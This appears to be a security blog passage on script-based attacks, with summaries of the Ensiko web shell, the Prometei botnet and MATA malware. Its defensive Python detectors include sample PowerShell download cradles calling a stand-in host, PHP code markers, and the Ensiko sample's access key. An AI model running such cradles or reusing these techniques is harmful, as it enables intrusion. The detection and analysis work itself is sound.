Script Attacks.. Encyclopaedia

Attackers always seek out new ways to evade detection. As most endpoint security products handle file-based attacks relatively well, scripts are an excellent way for attackers to avoid making changes to a disk, thus bypassing the threat detection capabilities of most products. In today’s threat landscape, scripts provide initial access, enable evasion, and facilitate lateral movement post-infection.

Script-based attacks

A script can be anything from a sequence of simple system commands to a program in an advanced scripting language used for system configuration, complex task automation, and other general purposes. Common scripting languages are VBScript, JavaScript, and PowerShell. Unlike applications that are compiled into machine code before they run, scripts are read and interpreted at run time.

How attackers use scripts

Payload delivery and lateral movement follow a successful script-initiated infection. The payload performs actions desired by the attacker, such as information collection, file encryption, or backdoor communication. At the same time, lateral movement leads to infection of additional computers within the network.

The use of scripts poses many advantages to the attacker: scripts are easy to write and execute, trivial to obfuscate, and extremely polymorphic. Moreover, attackers can use many types of script files to carry out an attack – the most popular being PowerShell, JavaScript, HTA, VBA, VBS, and batch scripts. Since fileless attacks occur in memory, traditional static file detection is rendered useless.

Script-based attacks run on virtually all Windows systems, increasing the potential attack surface and the chance of infection. One major drawback of script-based attacks is that, unless deployed via an exploit, user interaction is required for the script to run.

Many types of malware use scripts. For instance, a script that downloads a PE file can either save it to disk or run it from memory, depending on its level of sophistication. The script can also perform additional malicious actions, such as collecting information about the victim, from the computer name to saved passwords.


PowerShell is a framework used for configuration management and task automation, with a command-line shell and scripting language. PowerShell provides access to Microsoft Windows Management Instrumentation (WMI) and Component Object Model (COM), which makes it a useful and versatile tool for system administrators automating IT management processes, but also for attackers seeking a foothold in the system.

A malicious file loader using PowerShell

Attackers use PowerShell in their attacks to load malware directly into memory without writing to disk, thus bypassing many endpoint security products. Attackers also use PowerShell to automate data exfiltration and infection processes using frameworks such as Metasploit or PowerSploit.

As with other types of attacks, in a script-based attack the initial foothold on the victim generally comes from a successful phishing attack that carries a dropper – such as a PDF, RTF, Office file, or archive. In most cases, the dropper then runs a script, either a VBA macro or another type of script, such as PowerShell, JavaScript, or HTA.


JavaScript is a standard scripting language used in web pages, web applications, and browsers. JavaScript can also manipulate and modify PDF files through the objects the PDF format exposes, web page links, and more. Most PDF-based attacks use the PDF reader software or an in-browser reader to run JavaScript code on the victim’s machine.

Additional script-based threats

An HTML Application (HTA) is a Microsoft Windows file type designed to run in Internet Explorer’s engine, combining HTML code with Internet Explorer-supported scripts such as VBScript or JScript. HTA files execute through the Microsoft HTA engine (mshta.exe), which runs with the local user’s privileges instead of Internet Explorer’s restricted privileges, giving the embedded script access to the file system and registry.

Malicious HTA files allow scripts to run on the machine with local user privileges to download and run executables or additional scripts. Though considered an old attack vector, many script-based attacks continue to use HTA files. These files can be sent as attachments, downloaded by another script, or reached through redirects from malicious websites.

Is it safe to run scripts on the network?

With script-based attacks on the rise, organizations need to be ready to combat attacks in which the entire attack sequence occurs in memory.

A basic first step any organization should consider is segmenting employees into several groups:

1. Running scripts is part of their day-to-day job
2. Running scripts is not common but might happen
3. There is no need to run scripts

With these foundational rules in place, organizations should seek out security solutions with specific capabilities that balance detection of script-based attacks against the needs of users who must run scripts for their job function, so that those users can work without interruption.
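As an added illustration (not part of the original entry and not the code of any product it mentions), the following Python script shows how the three groups above can be turned into a detection policy applied to PowerShell script block log entries. The usernames, group assignments, indicator patterns and log records are all constructed for the example; the only external fact it relies on is that PowerShell’s -EncodedCommand argument carries base64 of UTF-16LE script text, which the scanner decodes and rescans so that encoding does not hide an in-memory download cradle.

```python
import base64
import re

# Assumed mapping of users to the three groups the text describes (constructed
# sample, not real directory data): 1 = runs scripts daily, 2 = occasionally,
# 3 = never needs to.
GROUPS = {"alice": 1, "dave": 1, "bob": 2, "carol": 3}

# A download cradle is an interpreter call plus a network fetch in one block:
# the script is pulled over HTTP and executed without ever being written to disk.
RUNNER = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)
FETCHER = re.compile(r"DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I)

# Single-pattern indicators. Illustrative only, not a vendor signature set.
PATTERNS = {
    # a .NET assembly (a PE file) loaded straight from a byte array in memory
    "reflective_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\b", re.I),
    # console window suppressed, typical of launchers started from a dropper
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    # HTA engine invoked from a script (runs with the local user's privileges)
    "mshta": re.compile(r"\bmshta(?:\.exe)?\b", re.I),
}
# -EncodedCommand / -enc / -e carries a base64 blob of UTF-16LE script text
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIGH_SEVERITY = {"download_cradle", "reflective_load"}


def find_indicators(script: str, depth: int = 0) -> set:
    """Return the indicator names present in one script block.

    Encoded payloads are decoded and scanned recursively (bounded depth), so
    wrapping a cradle in -EncodedCommand does not hide it from the scan.
    """
    found = set()
    if RUNNER.search(script) and FETCHER.search(script):
        found.add("download_cradle")
    for name, pattern in PATTERNS.items():
        if pattern.search(script):
            found.add(name)
    for blob in ENCODED.findall(script):
        found.add("encoded_command")
        if depth < 3:
            try:
                inner = base64.b64decode(blob, validate=True).decode("utf-16-le", errors="ignore")
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
            found |= find_indicators(inner, depth + 1)
    return found


def decide(group: int, indicators: set) -> str:
    """Per-group policy from the text: the less a user needs scripts,
    the less evidence is required before a block is flagged."""
    if group == 3:
        return "block"  # no business need: any script execution is out of policy
    if group == 2:
        return "alert" if indicators else "allow"
    return "alert" if indicators & HIGH_SEVERITY else "allow"  # group 1: high severity only


def analyze(user: str, script: str) -> dict:
    group = GROUPS.get(user, 2)  # assumption: unknown users get the cautious middle group
    indicators = find_indicators(script)
    return {"user": user, "group": group,
            "indicators": sorted(indicators), "decision": decide(group, indicators)}


def _encode(ps: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample records in the shape of Script Block Logging entries
# (event ID 4104): (user, script text). Not real telemetry; hosts are .invalid.
SAMPLE_EVENTS = [
    ("alice", "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"),
    ("bob", "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"),
    ("carol", "powershell -nop -w hidden -EncodedCommand "
              + _encode("Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/x')")),
    ("dave", "[Reflection.Assembly]::Load($bytes).EntryPoint.Invoke($null, $null)"),
]


def run_samples() -> list:
    return [analyze(user, script) for user, script in SAMPLE_EVENTS]


if __name__ == "__main__":
    for result in run_samples():
        print(result)
```

The point of the group-aware decision is the balance the paragraph asks for: the same cradle produces an alert for an occasional user and a block for a user who should never run scripts, while a daily script user is only interrupted for the high-severity in-memory patterns.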

Ensiko ! Highly capable malware with ransomware features

Threat researchers have found a new feature-rich malware that can encrypt files on any system running PHP, making it a high risk for Windows, macOS, and Linux web servers.

The malware received the name Ensiko and is a web shell written in PHP. Attackers can use it to remotely control a compromised system and run a host of malicious activities.

Among Ensiko’s large list of capabilities, the file-encryption component stands out, as it can be used for ransomware attacks against servers.

Researchers found that it uses the symmetric Rijndael-128 cipher (the AES block cipher) in CBC mode to encrypt files.

Ensiko encrypts files in a web shell directory and subdirectories and appends the .BAK extension to processed files.

The malware can be password protected to restrict access and avoid a takeover like the one that happened last week with Emotet, when someone replaced the malware payloads with memes.

Authenticating to this web shell is not straightforward. The developer hid the login form on a “Not Found” page. For the analyzed sample, the access key is “RaBiitch.”

To expand its capabilities, Ensiko can load several tools, which it downloads from Pastebin and stores in a directory named “tools_ensikology.”

One of the functions of the malware is called Steganologer, which can identify image files that have code in their metadata (EXIF headers). The code is then extracted and executed on the compromised server.
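An added example of the defender’s side of the Steganologer feature (this is not Ensiko’s code and not from the page’s source): a scanner that walks the metadata segments of a JPEG (APP1/Exif, COM and similar) and reports byte patterns that look like PHP code rather than descriptive text. The JPEG builder, the marker list and the two sample images are constructed here for the demonstration; the APP1 payload is simplified to plain text after the Exif header, whereas a real file wraps it in a TIFF structure, which byte-level scanning does not depend on.

```python
# Byte sequences that indicate executable PHP rather than descriptive text.
CODE_MARKERS = [b"<?php", b"<?=", b"eval(", b"base64_decode(", b"system(", b"passthru("]

# JPEG marker numbers for the metadata segments most often used to hide code.
SEGMENT_NAMES = {0xE0: "APP0/JFIF", 0xE1: "APP1/Exif", 0xED: "APP13/IPTC", 0xFE: "COM"}


def iter_jpeg_segments(data: bytes):
    """Yield (marker, payload) for every marker segment before the image data.

    Malformed input raises ValueError instead of being skipped, so a truncated
    or tampered file is reported rather than passed as clean.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker byte at offset {pos}")
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI, or SOS: entropy-coded image data follows
            return
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM / RSTn carry no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError(f"truncated segment header at offset {pos}")
        length = int.from_bytes(data[pos + 2:pos + 4], "big")  # includes the 2 length bytes
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"bad segment length {length} at offset {pos}")
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length
    raise ValueError("unexpected end of file before SOS/EOI")


def find_code_in_metadata(data: bytes) -> list:
    """Return (segment name, marker) pairs for every code marker found in metadata."""
    hits = []
    for marker, payload in iter_jpeg_segments(data):
        name = SEGMENT_NAMES.get(marker, f"marker 0x{marker:02X}")
        for needle in CODE_MARKERS:
            if needle in payload:
                hits.append((name, needle.decode("ascii")))
    return hits


def build_sample_jpeg(exif_text: bytes, comment: bytes) -> bytes:
    """Construct a minimal JPEG with an APP1 and a COM segment (test fixture only)."""
    def seg(marker: int, payload: bytes) -> bytes:
        return bytes([0xFF, marker]) + (len(payload) + 2).to_bytes(2, "big") + payload
    return (b"\xff\xd8"
            + seg(0xE1, b"Exif\x00\x00" + exif_text)   # simplified Exif payload
            + seg(0xFE, comment)
            + seg(0xDA, b"\x01\x01\x00\x00\x3f\x00")    # SOS header, scan data follows
            + b"\x00" * 8 + b"\xff\xd9")


# Constructed samples: one ordinary image, one with code planted in its metadata.
CLEAN_IMAGE = build_sample_jpeg(b"Camera: constructed sample", b"holiday photo")
TAINTED_IMAGE = build_sample_jpeg(b"<?php echo 'constructed sample'; ?>",
                                  b"eval(base64_decode('Y29uc3RydWN0ZWQ='))")

if __name__ == "__main__":
    print("clean:", find_code_in_metadata(CLEAN_IMAGE))
    print("tainted:", find_code_in_metadata(TAINTED_IMAGE))
```

Run over an upload directory or a web root, the same walk flags the image files a Steganologer-style loader would consume, and the strict parsing means a file that is not really a JPEG at all is reported rather than ignored.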

Ensiko can also check if a web shell from a predefined list is present on a remote host. Another scanning function called Remote File Check allows the operator to look for arbitrary files on a remote system.

Another function in this malicious tool recursively overwrites all files with a specified extension in the web shell’s directory.

Ensiko’s capabilities do not stop there, though. The malware lets threat actors run brute-force attacks against FTP, cPanel, and Telnet, enabling them to gain extended access.

Prometei ! Crypto Mining Botnet

One of the most advantageous qualities a cyber threat can have is the ability to go unnoticed.

A recent investigation found a botnet that does just that. Called “Prometei,” this cryptocurrency mining botnet uses techniques to fly under the radar of end users, though the strategies themselves might be obvious to a defender.

“The actor employs various methods to spread across the network, like SMB with stolen credentials, psexec, WMI and SMB exploits. The adversary also uses several crafted tools that help the botnet increase the amount of systems participating in its Monero-mining pool.”

“But this takeover didn’t stop its mining capabilities or the validation of stolen credentials. The botnet continues to make a moderate profit for a single developer, most likely based in Eastern Europe.

The actor behind it is also likely its developer. The TTPs indicate we may be dealing with a professional developer, based on their ability to integrate SMB exploits such as Eternal Blue and authentication code and the use of existing open-source projects, such as Mimikatz and FreeRDP.”

How it works

Everything starts with the main botnet file. The infection copies and spreads throughout the system, using passwords retrieved by a modified Mimikatz module and exploits like Eternal Blue.

The botnet has more than 15 executable modules that all get downloaded and driven by the main module, which constantly communicates with the command and control (C2) server over HTTP. The data it sends is encrypted with RC4, and the module shares the RC4 key with the C2 using asymmetric encryption.

Apart from a large focus on spreading across the environment, Prometei also tries to recover administrator passwords. The discovered passwords are sent to the C2 and then reused by other modules that attempt to verify the validity of the passwords on other systems using SMB and RDP protocols.

In addition to stealing computing power, Prometei has another feature: stealing and validating credentials.

Although we only saw evidence of stolen credentials being used to spread laterally, they also have a value on underground markets, and the damage potential of losing important administrative usernames and passwords is very high.

This is why organizations that detect the presence of the Prometei botnet on their systems should act immediately to remove it and to make sure none of their credentials are leaked to the command and control server.

MATA Malware ! All the way from North Korea

Security researchers discovered a multi-platform malware framework called “MATA” that had succeeded in targeting victims worldwide.

The Russian security firm explained in its analysis that the first artifacts pertaining to MATA emerged back in April 2018. Whoever’s behind the malware framework then used the threat to target enterprises in Poland, Germany, Turkey, Korea, Japan and India.

The targeted organizations operated in several different economic sectors. Among the victims were a software company, an e-commerce business and an Internet Service Provider (ISP).

In these campaigns, the actors responsible for MATA demonstrated that they held various intentions for attacking their victims. With one organization, for instance, the malicious actors used the framework to query the victim’s databases for the sake of acquiring customer lists. With another victim, they used their threat to distribute VHD ransomware.

Researchers came across three versions of MATA, targeting Windows, Linux, and macOS respectively.

The Windows version consisted of several components including a loader malware and an orchestrator element. Using a hardcoded hex-string, the loader invoked an encrypted payload. This action paved the way for the orchestrator to load plugin files and execute them from memory. Those plugins gave attackers the ability to manipulate files, create an HTTP proxy server and perform other tasks.

The Linux version of MATA was available on a legitimate distribution site, while the macOS variant arrived as a trojanized two-factor authentication (2FA) application.

The security firm revealed that a variant of Manuscrypt, a malware family distributed by Lazarus, also shared a similar configuration structure with MATA.